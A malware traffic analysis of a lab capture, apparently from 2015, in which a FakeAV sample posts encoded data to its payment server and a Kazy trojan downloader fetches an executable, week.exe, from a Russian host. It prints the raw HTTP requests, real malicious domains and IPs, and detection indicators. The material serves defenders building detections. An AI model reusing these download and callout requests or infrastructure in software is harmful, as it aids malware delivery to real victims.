Traffic Sample PCAP of FakeAV Malware and Kazy Trojan Downloader

June 25, 2016

Two key indicators, both plaintext HTTP on port 80 from the victim 192.168.56.10 (a VirtualBox host-only network: the gateway MAC 0a:00:27:00:00:00 is the VirtualBox host adapter), so either one is visible to any sensor on the path:

FakeAV POST – POST /hrrgkkwhjdwwwww/order.php?pid=390 to vh86987.eurodir.ru (46.30.40.95). This is the rogue product attempting to set up a payment, with the pid linking the request to the current session. The form body (fields eimwae, gmsekqci, iqym, kueueo1 to kueueo5) and the chunked 200 OK reply are opaque blobs rather than readable fields; the kueueo values carry 0xF0 or 0xC2 at every second byte, which looks like a trivially encoded wide-character string rather than real encryption. A second POST to the same order.php, this time without the pid and with fields qgwm, ocqesgui and skcume, follows about five seconds later on the same keep-alive connection (client port 49241).

Trojan Downloader function – GET /week.exe from nowakdbo.bget.ru (5.101.152.71). The server answers 200 OK, application/octet-stream, Content-Length 237568, and the first segment shows the MZ/PE header of a 32-bit (machine 0x014C) executable. Later segments expose a CodeView record naming fase.pdb and an import table that mixes crypt32, user32, msimg32, cryptdll, odbctrac, uxtheme and kernel32 APIs with no coherent purpose next to GetProcAddress and LoadLibraryA, which is what a crypter stub that resolves its real imports at runtime tends to look like. nginx's ETag "55df1480-3a000" is mtime-size in hex: 0x55df1480 is 2015-08-27 13:45:36 UTC, matching Last-Modified, and 0x3a000 is 237568, matching Content-Length, so the file was put on the server under two hours before this victim fetched it.

Points worth keeping in mind when turning these into detections: both requests use the same MSIE 8.0 / Windows NT 6.1 User-Agent and send Cache-Control: no-cache but no Accept, Accept-Language or Referer header, which a real browser request would include. The packet timestamps are the sensor's local clock; the servers' Date headers place the same packets at 15:39 GMT, so the lab was four hours behind UTC. The remaining traffic is noise: LLMNR queries to 224.0.0.252 and ff02::1:3 (UDP 5355) for the name 1Gr2hcLa6j, and a connection to microsoft.com that is opened and closed without sending data, apparently a connectivity check.

Excerpt of the capture (tcpdump -A output):

2015-08-27 11:39:35.045855 ARP, Request who-has 192.168.56.1 tell 192.168.56.10, length 28
2015-08-27 11:39:35.046218 ARP, Reply 192.168.56.1 is-at 0a:00:27:00:00:00, length 46
2015-08-27 11:39:35.046432 IP 192.168.56.10.59725 > 8.8.8.8.53: 60725+ A? microsoft.com. (31)
2015-08-27 11:39:35.063594 IP 8.8.8.8.53 > 192.168.56.10.59725: 60725 2/0/0 A 134.170.188.221, A 134.170.185.46 (63)
2015-08-27 11:39:35.096336 IP 192.168.56.10.49240 > 134.170.188.221.80: Flags [S], seq 759739050, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2015-08-27 11:39:35.150435 IP 134.170.188.221.80 > 192.168.56.10.49240: Flags [S.], seq 4248410354, ack 759739051, win 8190, options [mss 1460,nop,wscale 4,nop,nop,sackOK], length 0
2015-08-27 11:39:35.150683 IP 192.168.56.10.49240 > 134.170.188.221.80: Flags [.], ack 1, win 256, length 0
2015-08-27 11:39:35.150905 IP 192.168.56.10.49240 > 134.170.188.221.80: Flags [F.], seq 1, ack 1, win 256, length 0
2015-08-27 11:39:35.181327 IP6 fe80::b094:423d:bad5:e23c.61490 > ff02::1:3.5355: UDP, length 28
1Gr2hcLa6j
2015-08-27 11:39:35.183294 IP 192.168.56.10.63629 > 224.0.0.252.5355: UDP, length 28
1Gr2hcLa6j
2015-08-27 11:39:35.205418 IP 134.170.188.221.80 > 192.168.56.10.49240: Flags [F.], seq 1, ack 2, win 511, length 0
2015-08-27 11:39:35.205529 IP 192.168.56.10.49240 > 134.170.188.221.80: Flags [.], ack 2, win 256, length 0
2015-08-27 11:39:35.291613 IP6 fe80::b094:423d:bad5:e23c.61490 > ff02::1:3.5355: UDP, length 28
1Gr2hcLa6j
2015-08-27 11:39:35.291891 IP 192.168.56.10.63629 > 224.0.0.252.5355: UDP, length 28
1Gr2hcLa6j
2015-08-27 11:39:37.828655 IP 192.168.56.10.52622 > 8.8.8.8.53: 9094+ A? vh86987.eurodir.ru. (36)
2015-08-27 11:39:38.066602 IP 8.8.8.8.53 > 192.168.56.10.52622: 9094 1/0/0 A 46.30.40.95 (52)
2015-08-27 11:39:38.969072 IP 192.168.56.10.49241 > 46.30.40.95.80: Flags [S], seq 1389821042, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
2015-08-27 11:39:39.090116 IP 46.30.40.95.80 > 192.168.56.10.49241: Flags [S.], seq 2866732242, ack 1389821043, win 14600, options [mss 1460,nop,nop,sackOK,nop,wscale 9], length 0
2015-08-27 11:39:39.090503 IP 192.168.56.10.49241 > 46.30.40.95.80: Flags [.], ack 1, win 16425, length 0
2015-08-27 11:39:39.092478 IP 192.168.56.10.49241 > 46.30.40.95.80: Flags [P.], seq 1:359, ack 1, win 16425, length 358: HTTP: POST /hrrgkkwhjdwwwww/order.php?pid=390 HTTP/1.1
POST /hrrgkkwhjdwwwww/order.php?pid=390 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: vh86987.eurodir.ru
Content-Length: 966
Cache-Control: no-cache
2015-08-27 11:39:39.092812 IP 192.168.56.10.49241 > 46.30.40.95.80: Flags [P.], seq 359:1325, ack 1, win 16425, length 966: HTTP

eimwae=88789850&gmsekqci=16FF0EB00EA6433310B324B2F7&iqym=70AFD9C6AD22E1E3A0F45B4858441F2400042818E925A56C2F84731B45B0C8633BCF8C5C32D9CFD1461B4996588285DC361C3F38D767DCD186A4F22F6A1E605011AC39E9376815EDFBC9E2358D04CA9B862F3412BD50237F4394C1360B49FDC57AD69F9B90888161EDA880C787A0B046D9564542F8612123866D348695899174B59EFF623413D96BDE9C297B0F88F081E65D539E25C2C5A72C730662927FCB9B84189B97&kueueo1=61F04BC27EF021C250F01EC245F003C243F01CC266F010C256F010C27EF014C25AF001C24EF01EC250F014C250F02DC24DF01CC25BF01DC241F000C249F002C255F05FC247F009C247F0&kueueo2=44F018C250F014C244F01EC25AF05FC247F009C247F0&kueueo3=72F022C272F024C260F026C271F05CC272F032C27EF021C271F021C277F033C275F022C2&kueueo4=6BF01FC256F014C24EF059C270F058C202F029C247F01EC24CF059C270F058C202F032C272F024C202F034C211F05CC213F043C210F044C202F007C211F051C262F051C211F05FC210F041C265F039C258F0&kueueo5=74F018C250F005C257F010C24EF033C24DF009C202F036C250F010C252F019C24BF012C251F051C263F015C243F001C256F014C250F0
2015-08-27 11:39:39.213414 IP 46.30.40.95.80 > 192.168.56.10.49241: Flags [.], ack 359, win 31, length 0
2015-08-27 11:39:39.213445 IP 46.30.40.95.80 > 192.168.56.10.49241: Flags [.], ack 1325, win 35, length 0
2015-08-27 11:39:39.282319 IP 46.30.40.95.80 > 192.168.56.10.49241: Flags [P.], seq 1:350, ack 1325, win 35, length 349: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 27 Aug 2015 15:39:39 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.42

a4
[164-byte chunk body, not printable]
0
2015-08-27 11:39:39.478157 IP 192.168.56.10.49241 > 46.30.40.95.80: Flags [.], ack 350, win 16337, length 0
2015-08-27 11:39:44.332404 IP 192.168.56.10.49241 > 46.30.40.95.80: Flags [P.], seq 1325:2068, ack 350, win 16337, length 743: HTTP: POST /hrrgkkwhjdwwwww/order.php HTTP/1.1
POST /hrrgkkwhjdwwwww/order.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: vh86987.eurodir.ru
Content-Length: 393
Cache-Control: no-cache

qgwm=7D30747F51F23222258A85AEAA8F38429F&ocqesgui=27258430&skcume=16290CA72D61C87DD39A110902ED31D2A44757B295E924EF5B8D42E53BE86B4170E0E3577743D0C1B86223D57598EA0166E96E7B06ADA2F14C37205259180DCB892E1B5B9B4F891A4042EB249E6F25DBC27C9D070224AB2D56E8E038FAC6FA9CE0E0C78D309452C9ABC349FCD11159B0D87E7307C29E5104B70DA601CD9C0CDE5A7881DFDEB9A8BB0F2AF4D4D51BD93B1EB30CB6C18A5780EC63223F1DF35BBFB789BFB0
2015-08-27 11:39:44.370298 IP 192.168.56.10.61985 > 8.8.8.8.53: 63530+ A? nowakdbo.bget.ru. (34)
2015-08-27 11:39:44.450567 IP6 fe80::b094:423d:bad5:e23c.57441 > ff02::1:3.5355: UDP, length 28
1Gr2hcLa6j
2015-08-27 11:39:44.451157 IP 192.168.56.10.57321 > 224.0.0.252.5355: UDP, length 28
1Gr2hcLa6j
2015-08-27 11:39:44.453354 IP 46.30.40.95.80 > 192.168.56.10.49241: Flags [.], ack 2068, win 39, length 0
2015-08-27 11:39:44.473743 IP 46.30.40.95.80 > 192.168.56.10.49241: Flags [P.], seq 350:628, ack 2068, win 39, length 278: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 27 Aug 2015 15:39:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.42

5d
[93-byte chunk body, not printable]
0
2015-08-27 11:39:44.558406 IP6 fe80::b094:423d:bad5:e23c.57441 > ff02::1:3.5355: UDP, length 28
1Gr2hcLa6j
2015-08-27 11:39:44.558725 IP 192.168.56.10.57321 > 224.0.0.252.5355: UDP, length 28
1Gr2hcLa6j
2015-08-27 11:39:44.611693 IP 8.8.8.8.53 > 192.168.56.10.61985: 63530 1/0/0 A 5.101.152.71 (50)
2015-08-27 11:39:44.750140 IP 192.168.56.10.49242 > 5.101.152.71.80: Flags [P.], seq 1:261, ack 1, win 16425, length 260: HTTP: GET /week.exe HTTP/1.1
GET /week.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: nowakdbo.bget.ru
Cache-Control: no-cache
2015-08-27 11:39:44.885681 IP 5.101.152.71.80 > 192.168.56.10.49242: Flags [.], ack 261, win 134, length 0
2015-08-27 11:39:44.885691 IP 5.101.152.71.80 > 192.168.56.10.49242: Flags [.], seq 1:1461, ack 261, win 134, length 1460: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx/1.9.4
Date: Thu, 27 Aug 2015 15:39:44 GMT
Content-Type: application/octet-stream
Content-Length: 237568
Last-Modified: Thu, 27 Aug 2015 13:45:36 GMT
Connection: keep-alive
Keep-Alive: timeout=30
ETag: "55df1480-3a000"
Expires: Sat, 26 Sep 2015 15:39:44 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

MZ......................@..............................!..L.!This program cannot be run in DOS mode.
$...U.I.;.I.;...RichI.;....PE..L...g.#P....  [PE signature, machine 0x014C (i386); section table: .text .rdata .data .rsrc; rest of the segment not printable]
2015-08-27 11:39:44.885699 IP 5.101.152.71.80 > 192.168.56.10.49242: Flags [.], seq 1461:2921, ack 261, win 134, length 1460: HTTP
[no printable bytes]
2015-08-27 11:39:44.885705 IP 5.101.152.71.80 > 192.168.56.10.49242: Flags [.], seq 2921:4381, ack 261, win 134, length 1460: HTTP
[no printable bytes]
2015-08-27 11:39:57.937205 IP 5.101.152.71.80 > 192.168.56.10.49242: Flags [.], seq 24821:26281, ack 261, win 134, length 1460: HTTP
RSDS....fase.pdb  [CodeView debug record]
crypt32.dll: CertAlgIdToOID, CertCreateContext, CertCreateCTLContext, CertDuplicateStore, CryptEnumOIDInfo, CertCloseStore, CertFindAttribute, CertGetNameStringA, CertSetStoreProperty, CryptMsgClose, CertFindChainInStore, CertDuplicateCRLContext, CertCreateCRLContext, CertOpenStore
user32.dll (continues in the next segment): InsertMenuW, GetWindowTextA, LoadCursorA, CreateDesktopA, EnumDesktopsA, LoadImageW, LoadBitmapW, CreateWindowExW, SendMessageA, wsprintfW, DrawTextExA, EndDialog, InsertMenuW, MessageBo
2015-08-27 11:39:57.937321 IP 192.168.56.10.49242 > 5.101.152.71.80: Flags [.], ack 26281, win 16425, length 0
2015-08-27 11:40:01.992399 ARP, Request who-has 192.168.56.1 (0a:00:27:00:00:00) tell 192.168.56.10, length 28
2015-08-27 11:40:03.061681 IP 5.101.152.71.80 > 192.168.56.10.49242: Flags [.], seq 26281:27741, ack 261, win 134, length 1460: HTTP
xA (end of MessageBoxA, split across the segment boundary), GetFocus, OemToCharA, FindWindowExA (end of user32.dll)
msimg32.DLL: GradientFill, vSetDdrawflag
cryptdll.dll: MD5Final, MD5Update, CDLocateRng
odbctrac.dll: TraceSQLConnect, TraceSQLBindCol
uxtheme.dll: GetThemeSysSize, GetThemeFont, GetThemeSysBool, GetThemeTextMetrics, DrawThemeBackground, IsThemeActive, CloseThemeData, GetThemeInt, GetThemeColor, OpenThemeData, GetThemeRect, SetWindowTheme
kernel32.dll: GetProcAddress, LoadLibraryA, FindFirstFileA, CompareStringW, FoldStringA, GetStartupInfoW, GetFileSize, GetLogicalDriveStringsA, InitializeCriticalSection, GetLocaleInfoW, ReplaceFileW, CreateDirectoryW, GetDateFormatA, HeapFree, WaitForSingleObject, GetCommandLineW, GetOEMCP, ReadFile, GetCurrentDirectoryA, TlsGetValue
[rest of the segment not printable]
